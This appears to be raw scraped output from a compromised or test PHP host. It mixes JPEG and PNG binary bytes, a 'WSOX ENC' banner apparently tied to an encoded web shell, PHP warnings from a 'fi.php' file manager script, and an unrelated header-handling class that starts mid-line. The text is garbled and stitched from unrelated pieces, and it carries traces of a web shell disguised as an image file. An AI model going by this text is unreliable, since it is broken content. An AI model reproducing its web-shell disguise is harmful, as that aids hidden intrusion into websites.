1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
globals = $globals ?? $_SERVER; $this->setHeaders($headers); } /** * {@inheritdoc} */ public function addHeader($name, $value): HeadersInterface { [$values, $originalName, $normalizedName] = $this->prepareHeader($name, $value); if (isset($this->headers[$normalizedName])) { $header = $this->headers[$normalizedName]; $header->addValues($values); } else { $this->headers[$normalizedName] = new Header($originalName, $normalizedName, $values); } return $this; } /** * {@inheritdoc} */ public function removeHeader(string $name): HeadersInterface { $name = $this->normalizeHeaderName($name); unset($this->headers[$name]); return $this; } /** * {@inheritdoc} */ public function getHeader(string $name, $default = []): array { $name = $this->normalizeHeaderName($name); if (isset($this->headers[$name])) { $header = $this->headers[$name]; return $header->getValues(); } if (empty($default)) { return $default; } $this->validateHeader($name, $default); return $this->trimHeaderValue($default); } /** * {@inheritdoc} */ public function setHeader($name, $value): HeadersInterface { [$values, $originalName, $normalizedName] = $this->prepareHeader($name, $value); // Ensure we preserve original case if the header already exists in the stack if (isset($this->headers[$normalizedName])) { $existingHeader = $this->headers[$normalizedName]; $originalName = $existingHeader->getOriginalName(); } $this->headers[$normalizedName] = new Header($originalName, $normalizedName, $values); return $this; } /** * {@inheritdoc} */ public function setHeaders(array $headers): HeadersInterface { $this->headers = []; foreach ($this->parseAuthorizationHeader($headers) as $name => $value) { $this->addHeader($name, $value); } return $this; } /** * {@inheritdoc} */ public function hasHeader(string $name): bool { $name = $this->normalizeHeaderName($name); return isset($this->headers[$name]); } /** * {@inheritdoc} */ public function getHeaders(bool $originalCase = false): array { $headers = []; foreach ($this->headers as $header) { $name = $originalCase ? $header->getOriginalName() : $header->getNormalizedName(); $headers[$name] = $header->getValues(); } return $headers; } /** * @param string $name * @param bool $preserveCase * @return string */ protected function normalizeHeaderName(string $name, bool $preserveCase = false): string { $name = strtr($name, '_', '-'); if (!$preserveCase) { $name = strtolower($name); } if (strpos(strtolower($name), 'http-') === 0) { $name = substr($name, 5); } return $name; } /** * Parse incoming headers and determine Authorization header from original headers * * @param array $headers * @return array */ protected function parseAuthorizationHeader(array $headers): array { $hasAuthorizationHeader = false; foreach ($headers as $name => $value) { if (strtolower($name) === 'authorization') { $hasAuthorizationHeader = true; break; } } if (!$hasAuthorizationHeader) { if (isset($this->globals['REDIRECT_HTTP_AUTHORIZATION'])) { $headers['Authorization'] = $this->globals['REDIRECT_HTTP_AUTHORIZATION']; } elseif (isset($this->globals['PHP_AUTH_USER'])) { $pw = isset($this->globals['PHP_AUTH_PW']) ? $this->globals['PHP_AUTH_PW'] : ''; $headers['Authorization'] = 'Basic ' . base64_encode($this->globals['PHP_AUTH_USER'] . ':' . $pw); } elseif (isset($this->globals['PHP_AUTH_DIGEST'])) { $headers['Authorization'] = $this->globals['PHP_AUTH_DIGEST']; } } return $headers; } /** * @param array|string $value * * @return array */ protected function trimHeaderValue($value): array { $items = is_array($value) ? $value : [$value]; $result = []; foreach ($items as $item) { $result[] = trim((string) $item, " \t"); } return $result; } /** * @param string $name * @param array|string $value * * @throws InvalidArgumentException * * @return array */ protected function prepareHeader($name, $value): array { $this->validateHeader($name, $value); $values = $this->trimHeaderValue($value); $originalName = $this->normalizeHeaderName($name, true); $normalizedName = $this->normalizeHeaderName($name); return [$values, $originalName, $normalizedName]; } /** * Make sure the header complies with RFC 7230. * * Header names must be a non-empty string consisting of token characters. * * Header values must be strings consisting of visible characters with all optional * leading and trailing whitespace stripped. This method will always strip such * optional whitespace. Note that the method does not allow folding whitespace within * the values as this was deprecated for almost all instances by the RFC. * * header-field = field-name ":" OWS field-value OWS * field-name = 1*( "!" / "#" / "$" / "%" / "&" / "'" / "*" / "+" / "-" / "." / "^" * / "_" / "`" / "|" / "~" / %x30-39 / ( %x41-5A / %x61-7A ) ) * OWS = *( SP / HTAB ) * field-value = *( ( %x21-7E / %x80-FF ) [ 1*( SP / HTAB ) ( %x21-7E / %x80-FF ) ] ) * * @see https://tools.ietf.org/html/rfc7230#section-3.2.4 * * @param string $name * @param array|string $value * * @throws InvalidArgumentException; */ protected function validateHeader($name, $value): void { $this->validateHeaderName($name); $this->validateHeaderValue($value); } /** * @param mixed $name * * @throws InvalidArgumentException */ protected function validateHeaderName($name): void { if (!is_string($name) || preg_match("@^[!#$%&'*+.^_`|~0-9A-Za-z-]+$@", $name) !== 1) { throw new InvalidArgumentException('Header name must be an RFC 7230 compatible string.'); } } /** * @param mixed $value * * @throws InvalidArgumentException */ protected function validateHeaderValue($value): void { $items = is_array($value) ? $value : [$value]; if (empty($items)) { throw new InvalidArgumentException( 'Header values must be a string or an array of strings, empty array given.' ); } $pattern = "@^[ \t\x21-\x7E\x80-\xFF]*$@"; foreach ($items as $item) { $hasInvalidType = !is_numeric($item) && !is_string($item); $rejected = $hasInvalidType || preg_match($pattern, (string) $item) !== 1; if ($rejected) { throw new InvalidArgumentException( 'Header values must be RFC 7230 compatible strings.' ); } } } /** * @return static */ public static function createFromGlobals() { $headers = null; if (function_exists('getallheaders')) { $headers = getallheaders(); } if (!is_array($headers)) { $headers = []; } return new static($headers); } }